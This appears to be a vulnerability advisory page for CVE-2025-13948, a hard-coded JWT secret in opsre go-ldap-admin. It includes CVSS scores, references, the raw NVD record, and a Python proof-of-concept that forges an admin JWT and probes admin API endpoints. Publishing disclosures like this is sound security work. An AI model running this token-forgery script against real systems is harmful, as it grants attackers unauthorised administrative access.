CVE-2025-13948

Description

A vulnerability was determined in opsre go-ldap-admin up to 20251011. This issue affects some unknown processing of the file docs/docker-compose/docker-compose.yaml of the component JWT Handler. Executing manipulation of the argument secret key can lead to use of hard-coded cryptographic key . The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

5.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

opsre go-ldap-admin <= 20251011

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-13948 PoC - opsre go-ldap-admin Hard-coded JWT Secret Key
This PoC demonstrates how to forge JWT tokens using the hard-coded secret key.
"""
import jwt
import datetime
import requests

# Hard-coded secret key from docker-compose.yaml (example key)
JWT_SECRET = "your-hardcoded-secret-key-here"

# Target configuration
TARGET_URL = "http://target:8080"
USERNAME = "admin"

def forge_jwt_token(username: str, secret: str) -> str:
    """
    Generate a forged JWT token with the hard-coded secret.
    
    Args:
        username: Target username to impersonate
        secret: Hard-coded JWT secret key
    
    Returns:
        Forged JWT token string
    """
    payload = {
        "sub": username,
        "iat": datetime.datetime.utcnow(),
        "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=24),
        "username": username,
        "role": "admin"
    }
    token = jwt.encode(payload, secret, algorithm="HS256")
    return token

def exploit(target_url: str, forged_token: str):
    """
    Use the forged token to access protected endpoints.
    
    Args:
        target_url: Base URL of the vulnerable application
        forged_token: JWT token forged with hard-coded key
    """
    headers = {
        "Authorization": f"Bearer {forged_token}"
    }
    
    # Try to access admin endpoints
    endpoints = [
        "/api/v1/users",
        "/api/v1/admin/config",
        "/api/v1/ldap/sync"
    ]
    
    for endpoint in endpoints:
        try:
            response = requests.get(f"{target_url}{endpoint}", headers=headers)
            print(f"[+] {endpoint} - Status: {response.status_code}")
            if response.status_code == 200:
                print(f"    [!] Successfully accessed {endpoint}")
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")

def main():
    print("[*] CVE-2025-13948 PoC - opsre go-ldap-admin JWT Secret Disclosure")
    print("[*] Exploiting hard-coded JWT secret key vulnerability\n")
    
    # Step 1: Obtain the hard-coded secret (e.g., from leaked config)
    print("[1] Obtaining hard-coded JWT secret from configuration...")
    print(f"    Secret: {JWT_SECRET}")
    
    # Step 2: Forge JWT token for admin user
    print("\n[2] Forging JWT token for admin user...")
    forged_token = forge_jwt_token(USERNAME, JWT_SECRET)
    print(f"    Generated Token: {forged_token[:50]}...")
    
    # Step 3: Use forged token to access protected resources
    print("\n[3] Using forged token to access protected endpoints...")
    exploit(TARGET_URL, forged_token)
    
    print("\n[*] Exploitation complete")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13948
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13948
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13948/
[4] VulDB https://vuldb.com/cve/CVE-2025-13948
[5] https://gist.github.com/H2u8s/a51ac1fe38d62746d1425b70ff49420c
[6] https://vuldb.com/?ctiid.334163
[7] https://vuldb.com/?id.334163
[8] https://vuldb.com/?submit.692213

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13948", "sourceIdentifier": "[email protected]", "published": "2025-12-03T15:15:51.240", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in opsre go-ldap-admin up to 20251011. This issue affects some unknown processing of the file docs/docker-compose/docker-compose.yaml of the component JWT Handler. Executing manipulation of the argument secret key can lead to use of hard-coded cryptographic key\r . The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-320"}, {"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://gist.github.com/H2u8s/a51ac1fe38d62746d1425b70ff49420c", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334163", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334163", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.692213", "source": "[email protected]"}]}}